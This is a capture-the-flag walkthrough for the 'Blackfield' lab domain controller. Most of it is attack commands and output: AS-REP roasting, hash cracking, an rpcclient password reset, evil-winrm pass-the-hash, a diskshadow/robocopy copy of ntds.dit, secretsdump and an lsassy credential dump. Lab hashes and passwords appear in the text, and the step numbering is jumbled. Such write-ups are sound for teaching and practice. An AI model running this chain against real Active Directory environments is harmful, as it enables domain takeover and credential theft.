Professional Documents
Culture Documents
Blackfield
Blackfield
Blackfield
Opened ports:
`
#masscan -i tun0 10.10.10.192 -p0-65535 --rate 10000
Discovered open port 88/tcp on 10.10.10.192
Discovered open port 445/tcp on 10.10.10.192
Discovered open port 593/tcp on 10.10.10.192
Discovered open port 135/tcp on 10.10.10.192
53/udp open domain (generic dns response: SERVFAIL)
`
2. SMB listing:
smbclient -L //10.10.10.192
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
# smbclient //10.10.10.192/profiles$
smb: \> dir
. D 0 Wed Jun 3 16:47:12 2020
.. D 0 Wed Jun 3 16:47:12 2020
AAlleni D 0 Wed Jun 3 16:47:11 2020
ABarteski D 0 Wed Jun 3 16:47:11 2020
--[SNIP]--
`
3. Copy the usernames to a file users.txt and scan for Kerberos tickets:
GetNPUsers.py BLACKFIELD.local/ -usersfile users.txt -format hashcat -output
hashes.asreproast -dc-ip 10.10.10.192
...
[*]Getting TGT for support
$krb5asrep$23$support@BLACKFIELD.LOCAL:422866063277e0f25f87931e6c192bba$cbe1cd70856
35f4b1c527d3e42fe9d3a2417581bb24ba9ae75aa1cfceff09e071474aa7b535322575c06527cbd0afe
aead168eb52488cd1ef4e81f231c1d5bee649b5eab98cb9c9a164330a254e2d4a4c80104f46a77aeb3a
a108012546cda176a34eff1679fc4c72396e8c55b30b6ba79eece732dfd507830b5fba05544f8a31dd6
42c47f6fed69daaa5074cf6cddc212c71ca2a9718bf20039064025b911143e001e19f960d9d24a776df
1edde005c0c2ec484c92dacb4c6495aa4b38547304efedbb60e341eeeee8217477a0b375a48ea86beb4
552ec2b4e6cbbaf0d5976e6b5bf9c5478aff89bd7bf5bc3b420fc741fbd62d
`
4. Crack it:
`
# john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast
`
5. We can reset or change the password https://malicious.link/post/2017/reset-ad-
user-password-with-linux/ for audit2020 using support
# rpcclient -U support //10.10.10.192
rpcclient $> setuserinfo2 audit2020 23 'ICanHaz1ChzBrger'
rpcclient $> quit
# smbclient.py audit2020@10.10.10.192
WORKS!!
`
1. Using the found hash I can login with evil-winrm using svc_backup
`
# evil-winrm -H 9658d1d1dcd9250115e2205d9f48400d -u svc_backup -i 10.10.10.192
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..\Desktop
`
2. Time to privesc
`
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all
`
3. Enumerating you will find notes.txt and since svc_backup has backup ability
robocopy can be exploited in a way
`
*Evil-WinRM* PS C:\Documents and Settings\Administrator\Desktop> robocopy
C:/Users/Administrator/Desktop/ C:\Temp\ /B
100%
`
`
*Evil-WinRM* PS C:\Temp\> type notes.txt
`
`
diskshadow.txt - leave the spaces at the end of every line or else it will not
work:
set context persistent nowriters
add volume c: alias tester
create
expose %tester% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\temp\4thelolz\ntds.dit
delete shadows volume %tester%
reset
`
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color\> download ntds.dit
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color\> download system.bak
`
`
# secretsdump.py -ntds ntds.dit -system system.bak LOCAL
`
8. Evil winrm connect using the hash as administrator
`
# evil-winrm -H 184fb5e5178480be64824d4cd53b99ee -u administrator -i 10.10.10.192
Using Lsassy we can get the cleartext password and get NT Authority\System:
lsassy -d BLACKFIELD.LOCAL -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
10.10.10.192 -m 0 --procdump /opt/Sysinternals/procdump.exe --dumpert
/opt/Sysinternals/dumpert.exe
NT Authority\System:
# psexec.py Administrator:###_ADM1N_3920_###@10.10.10.192
# evil-winrm -p "###_ADM1N_3920_###" -u administrator -i 10.10.10.192
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee
:::